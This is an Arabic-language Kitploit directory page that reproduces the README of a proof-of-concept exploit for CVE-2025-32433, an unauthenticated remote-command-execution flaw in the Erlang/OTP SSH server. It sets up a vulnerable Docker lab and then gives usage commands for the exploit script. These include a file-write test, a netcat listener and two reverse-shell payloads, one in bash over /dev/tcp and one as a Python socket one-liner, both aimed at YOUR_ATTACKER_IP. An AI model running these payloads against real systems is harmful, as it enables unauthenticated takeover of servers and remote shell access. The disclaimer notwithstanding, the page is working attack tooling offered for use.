Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32433-PoC — إثبات مفهوم لاستغلال الثغرة CVE-2025-32433، مما يتيح تنفيذ الأوامر عن بُعد بدون مصادقة في Erlang/OTP SSH. يتضمن إعداد Docker وحمولات الصدفة العكسية لأغراض البحث الأمني وتحديات CTF. | Kitploit
أدوات/GitHubGitHub/niteeshpujari/cve-2025-32433-poc
تحليل الثغرات الأمنيةالاستغلالCTFاختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHubniteeshpujari/cve-2025-32433-poc

CVE-2025-32433-PoC

إثبات مفهوم لاستغلال الثغرة CVE-2025-32433، مما يتيح تنفيذ الأوامر عن بُعد بدون مصادقة في Erlang/OTP SSH. يتضمن إعداد Docker وحمولات الصدفة العكسية لأغراض البحث الأمني وتحديات CTF.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
71منذ سنة واحدةلم تتم المراجعة بعد

CVE-2025-32433: إثبات مفهوم الثغرة RCE غير المصادق عليها في SSH لـ Erlang/OTP

CVE-2025-32433

يحتوي هذا المستودع على إثبات مفهوم (PoC) للثغرة CVE-2025-32433، وهي ثغرة حرجة غير مصادق عليها لتنفيذ الأوامر عن بُعد (RCE) تؤثر على تطبيق خادم SSH في Erlang/Open Telecom Platform (OTP). صُمم هذا الإثبات للأغراض التعليمية، وبحوث الأمان، وتحديات Capture The Flag (CTF).

⚠️ إخلاء مسؤولية - للاستخدام التعليمي والأخلاقي فقط ⚠️

يُقدّم هذا الإثبات بدقة للأغراض التعليمية والأخلاقية في الاختراق. مخصص للاستخدام في بيئات خاضعة للرقابة، مثل الآلات الافتراضية المنعزلة أو منصات CTF، حيث يكون لديك إذن صريح لإجراء اختبار أمني.

لا تستخدم هذا الإثبات ضد أي نظام لا تملكه أو ليس لديك إذن كتابي صريح لاختباره. الوصول غير المصرح به أو استغلال أنظمة الحاسوب غير قانوني وغير أخلاقي. المؤلف والمشرفون على هذا المستودع غير مسؤولين عن أي سوء استخدام أو ضرر ناتج عن هذا الكود.


📊 نظرة عامة على الثغرة

الخاصيةالتفاصيل
معرف CVECVE-2025-32433
نوع الثغرةتنفيذ أوامر عن بُعد غير مصادق عليه (RCE)
درجة CVSS v3.110.0 (حرجة)
البرنامج المتأثرخادم SSH في Erlang/OTP (ssh)
الإصدارات المتأثرةOTP-27.3.2 وما قبله
OTP-26.2.5.10 وما قبله
OTP-25.3.2.19 وما قبله
الإصدارات من OTP 17.0 فما فوق
الإصدارات المُصحّحةOTP-27.3.3، OTP-26.2.5.11، OTP-25.3.2.20

التفاصيل التقنية

تكمُن الثغرة في كيفية معالجة خادم SSH في Erlang/OTP لرسائل بروتوكول SSH خلال مرحلة ما قبل المصادقة. على وجه التحديد، يفشل الخادم في تطبيق تسلسل بروتوكول SSH بشكل صحيح، مما يسمح لمهاجم عن بُعد غير مصادق بإرسال رسائل SSH_MSG_CHANNEL_OPEN وSSH_MSG_CHANNEL_REQUEST مُعدّلة. يتيح ذلك للمهاجم فتح قناة جلسة وتنفيذ أوامر Erlang اعتباطية (والتي يمكنها بدورها تنفيذ أوامر النظام) دون تقديم بيانات اعتماد صالحة. إذا كان خادم SSH يعمل بصلاحيات مرتفعة (مثل root)، فقد يؤدي الاستغلال الناجح إلى اختراق كامل للنظام.


🛠️ الإعداد: بناء البيئة الضعيفة (Docker)

أسهل طريقة لإعداد خادم SSH لـ Erlang/OTP ضعيف هي باستخدام ملف Dockerfile المُرفق.

  1. استنساخ هذا المستودع:

    root@kitploit:~
    git clone https://github.com/NiteeshPujari/CVE-2025-32433-PoC.git
    cd CVE-2025-32433-PoC
    
  2. بناء صورة Docker: يقوم هذا الأمر بتجميع نسخة ضعيفة من Erlang/OTP (OTP-26.2.5.10) وتكوين خادم SSH.

    root@kitploit:~
    docker build -t erlang-ssh-vulnerable .
    
  3. تشغيل حاوية الخادم الضعيفة: يؤدي هذا الأمر إلى بدء خادم SSH لـ Erlang/OTP في الخلفية، ليستمع على المنفذ 2222.

    root@kitploit:~
    docker run -d --name erlang-ssh-target -p 2222:2222 erlang-ssh-vulnerable
    
    • -d: تشغيل الحاوية في وضع منفصل.
    • --name erlang-ssh-target: تعيين اسم للحاوية لسهولة الإدارة.
    • -p 2222:2222: ربط المنفذ 2222 للمضيف بالمنفذ 2222 للحاوية.
  4. التحقق من أن الحاوية تعمل:


🚀 الاستخدام: تشغيل سكريبت إثبات المفهوم

يمكن تشغيل السكريبت cve_2025_32433_exploit.py إما بشكل تفاعلي أو باستخدام وسائط سطر الأوامر.

الوضع التفاعلي

إذا قمت بتشغيل السكريبت بدون وسائط، فسيطلب منك المعلومات اللازمة.

  1. تأكد من أن حاوية Docker الضعيفة تعمل.
  2. قم بتشغيل سكريبت PoC بلغة Python:
    root@kitploit:~
    python3 cve_2025_32433_exploit.py
    
  3. اتبع الموجهات التفاعلية: سيسألك السكريبت عن:
    • عنوان IP للهدف: (مثال: 127.0.0.1 إذا كنت تستهدف Docker على نفس المضيف).
    • منفذ الهدف: (مثال: 2222).
    • الأمر المراد تنفيذه: (اتركه فارغاً لاستخدام الأمر الاختباري الافتراضي).

مثال 1: اختبار RCE بإنشاء ملف

هذا هو السلوك الافتراضي إذا تركت حقل الأمر فارغاً في الوضع التفاعلي. يقوم بإنشاء ملف /tmp/note.txt على الهدف.

  1. تشغيل الاستغلال:
    root@kitploit:~
    python3 cve_2025_32433_exploit.py --target-ip 127.0.0.1 --target-port 2222 --command 'file:write_file("/tmp/note.txt", "Exploit Ran!").'
    
  2. التحقق من إنشاء الملف على الهدف:
    root@kitploit:~
    docker exec -it erlang-ssh-target cat /tmp/note.txt
    
    يجب أن ترى المخرجات: Exploit Ran!

مثال 2: الحصول على شل عكسي

للحصول على شل عكسي، يجب توفير حمولة تتصل بمستمع على جهازك.

  1. ابدأ مستمع Netcat على جهازك المُهاجم (مثلاً Kali Linux) على المنفذ الذي اخترته.

    root@kitploit:~
    nc -lvnp 4444
    

    مهم: تأكد من أن جدار الحماية (مثل ufw) على جهازك المُهاجم يسمح بالاتصالات الواردة على هذا المنفذ. sudo ufw allow 4444/tcp

  2. قم بتشغيل سكريبت PoC مع حمولة الشل العكسي. استبدل YOUR_ATTACKER_IP بعنوان IP لجهازك.

    • شل عكسي Bash:

      root@kitploit:~
      python3 cve_2025_32433_exploit.py --target-ip 127.0.0.1 --target-port 2222 --command 'os:cmd("bash -i >& /dev/tcp/YOUR_ATTACKER_IP/4444 0>&1").'
      
    • شل عكسي Python (غالباً أكثر موثوقية):

      root@kitploit:~
      python3 cve_2025_32433_exploit.py --target-ip 127.0.0.1 --target-port 2222 --command 'os:cmd("python3 -c ''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR_ATTACKER_IP\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);''").'
      
  3. تحقق من مستمع Netcat. يجب أن تستقبل اتصالاً وتحصل على شل في الحاوية المستهدفة.


🧹 التنظيف

لإيقاف وإزالة حاوية وصورة Docker:

root@kitploit:~
# إيقاف وإزالة الحاوية
docker stop erlang-ssh-target
docker rm erlang-ssh-target

# اختياري: إزالة الصورة أيضاً
docker rmi erlang-ssh-vulnerable
تنزيل الأداة
root@kitploit:~
docker ps